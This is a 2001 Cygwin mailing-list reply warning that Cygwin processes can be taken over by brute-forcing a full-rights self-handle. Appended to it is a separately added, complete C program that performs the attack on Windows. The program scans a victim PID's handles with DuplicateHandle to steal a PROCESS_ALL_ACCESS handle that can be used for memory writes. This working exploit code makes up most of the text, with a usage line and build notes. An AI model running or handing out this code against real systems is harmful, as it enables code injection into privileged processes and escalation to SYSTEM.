This is the mail archive of the cygwin@cygwin.com mailing list for the Cygwin project.
RE: The security of OpenSSH with cygwin.
- To: <joetesta at hushmail dot com>
- Subject: RE: The security of OpenSSH with cygwin.
- From: "Robert Collins" <robert dot collins at itdomain dot com dot au>
- Date: Tue, 22 May 2001 11:35:07 +1000
- Cc: <cygwin at cygwin dot com>
Joe,
Have you looked up the thread I referred you to? It explained the
issue. IN DETAIL.
> > Right. I cannot emphasize strongly enough that Cygwin is
> NOT A SECURE
> > ENVIRONMENT. Do NOT trust it with sensitive data. It is trivially
> > easy to hack.
> >
> > cgf
>
>
> My Windows programming days ended awhile ago, so pardon me if
> this is incorrect
> or doesn't make sense.
>
> Under Windows 9x and Millennium, there is no (respectable)
> security model,
....
Correct.
> Now this brings me to another question: what does this mean
> in Windows
> NT/2000? I have no experience with these operating systems,
> but here's
> what I dare to assume: the security model would disallow
> this inter-process
> mingling.
Please don't assume without at least reading the references you are
given. That wastes your time and ours.
No-one said _anything_ about the security model being the issue - they
said that
Cygwin AS IT IS IMPLEMENTED TODAY has KNOWN PROBLEMS resulting in
TRIVIAL HACKS.
Please read the thread I referred you to. It explains the particular
issue I mentioned. A thumbnail sketch is that 1) if you have access to
duplicate a handle from a process and
2) that process has a handle to itself with full rights (the default
behaviour)
3) a simple brute force attack will get you a handle to the process with
full rights, which lets you write into that process's memory space.
> Are there any other issues, proven or otherwise, that anyone
> is aware of?
I don't have a canonical list. Use the source Joe.
For your stated purpose, (ssh + cygwin), via the stated attack above if
I can run a custom, or via bash appropriate shellcode I can get memory
write access to any cygwin linked process. If that process happens to be
running as SYSTEM or an administrator access account, then injecting
custom code into that will pretty much open the door to anything.
Rob
--
Want to unsubscribe from this list?
Check out: http://cygwin.com/ml/#unsubscribe-simple
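The three-step sketch in Rob's message (duplicate-handle access to the victim, a full-rights self-handle in the victim's table, a brute-force scan of handle values followed by a memory write), written out as an added example. This is not code from the thread, from OpenSSH or from Cygwin. The Windows branch uses only OpenProcess, DuplicateHandle, GetProcessId and CloseHandle; HANDLE_SCAN_LIMIT, the struct and function names, and the constructed fake_entry table used off Windows are all assumptions made for this example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#ifdef _WIN32
#include <windows.h>
#endif

/* Windows handle values are small multiples of 4; the scan walks that space.
 * HANDLE_SCAN_LIMIT is a bound picked for this example, not from the thread. */
#define HANDLE_STEP 4u
#define HANDLE_SCAN_LIMIT 0x10000u

/* A probe tries one slot of the victim's table; true means a full-rights self-handle. */
typedef bool (*probe_fn)(uintptr_t candidate, void *ctx);

/* Step 3 of the sketch: brute force the handle space. Returns the hit slot or 0. */
uintptr_t scan_handle_table(probe_fn probe, void *ctx, uintptr_t limit)
{
    for (uintptr_t h = HANDLE_STEP; h < limit; h += HANDLE_STEP)
        if (probe(h, ctx))
            return h;
    return 0;
}

#ifdef _WIN32
struct win_ctx {
    HANDLE victim;     /* opened with PROCESS_DUP_HANDLE only (step 1) */
    DWORD  victim_pid;
    HANDLE stolen;     /* out: duplicated full-access handle to the victim */
};

static bool win_probe(uintptr_t candidate, void *arg)
{
    struct win_ctx *c = arg;
    HANDLE dup = NULL;
    /* Copy whatever sits in this slot into our table asking for PROCESS_ALL_ACCESS;
     * the kernel grants only rights the source handle holds, so this succeeds
     * when the slot is the full-rights self-handle the thread describes (step 2). */
    if (!DuplicateHandle(c->victim, (HANDLE)candidate, GetCurrentProcess(),
                         &dup, PROCESS_ALL_ACCESS, FALSE, 0))
        return false;
    if (GetProcessId(dup) == c->victim_pid) {
        c->stolen = dup;
        return true;
    }
    CloseHandle(dup);  /* some other object or process: keep scanning */
    return false;
}
#endif

/* Portable stand-in for a victim's handle table, constructed for this example. */
enum obj_type { OBJ_FILE, OBJ_EVENT, OBJ_PROCESS_SELF };
#define ACCESS_FULL    0x1FFFFFu  /* stands in for PROCESS_ALL_ACCESS */
#define ACCESS_LIMITED 0x0400u    /* e.g. query-information only */
struct fake_entry { uintptr_t value; enum obj_type type; unsigned access; };
struct fake_table { const struct fake_entry *entries; size_t n; };

static bool fake_probe(uintptr_t candidate, void *arg)
{
    const struct fake_table *t = arg;
    for (size_t i = 0; i < t->n; i++)
        if (t->entries[i].value == candidate)
            /* Mirror DuplicateHandle: a limited-rights self-handle is not a hit. */
            return t->entries[i].type == OBJ_PROCESS_SELF &&
                   (t->entries[i].access & ACCESS_FULL) == ACCESS_FULL;
    return false;
}

/* Scan a victim whose self-handle carries self_access; 0 means step 2 is absent. */
uintptr_t simulate_attack(unsigned self_access)
{
    const struct fake_entry table[] = {
        { 0x04, OBJ_EVENT,        0x1F0003u },
        { 0x08, OBJ_FILE,         0x120089u },
        { 0x44, OBJ_PROCESS_SELF, self_access },  /* the process's own handle */
    };
    struct fake_table t = { table, sizeof table / sizeof table[0] };
    return scan_handle_table(fake_probe, &t, HANDLE_SCAN_LIMIT);
}

int main(int argc, char **argv)
{
#ifdef _WIN32
    if (argc != 2) { fprintf(stderr, "usage: %s <victim-pid>\n", argv[0]); return 2; }
    struct win_ctx c = { NULL, (DWORD)strtoul(argv[1], NULL, 10), NULL };
    c.victim = OpenProcess(PROCESS_DUP_HANDLE, FALSE, c.victim_pid);
    if (!c.victim) { fprintf(stderr, "OpenProcess failed: %lu\n", GetLastError()); return 1; }
    uintptr_t hit = scan_handle_table(win_probe, &c, HANDLE_SCAN_LIMIT);
    if (!hit) { puts("no full-rights self-handle in scanned range"); return 1; }
    /* c.stolen now carries PROCESS_VM_WRITE: WriteProcessMemory on it is the
     * write into the victim's address space the thread warns about. */
    printf("full-access handle to pid %lu duplicated from slot %#lx\n",
           (unsigned long)c.victim_pid, (unsigned long)hit);
    CloseHandle(c.stolen);
    CloseHandle(c.victim);
#else
    (void)argc; (void)argv;
    printf("full-rights self-handle: slot %#lx\n", (unsigned long)simulate_attack(ACCESS_FULL));
    printf("limited self-handle:     slot %#lx\n", (unsigned long)simulate_attack(ACCESS_LIMITED));
#endif
    return 0;
}
```

Built on Windows (for instance with gcc under Cygwin or MinGW) and pointed at a PID, the scan only works when step 1 already holds, i.e. the caller can OpenProcess the victim with PROCESS_DUP_HANDLE, which is normally the case between processes of the same user. Step 2 is the Cygwin-specific part the thread blames: the limited-rights case in simulate_attack shows that without a full-rights self-handle the same scan yields nothing, which is also the check to make on a suspect process (list its handles and look for a process handle to itself carrying full access).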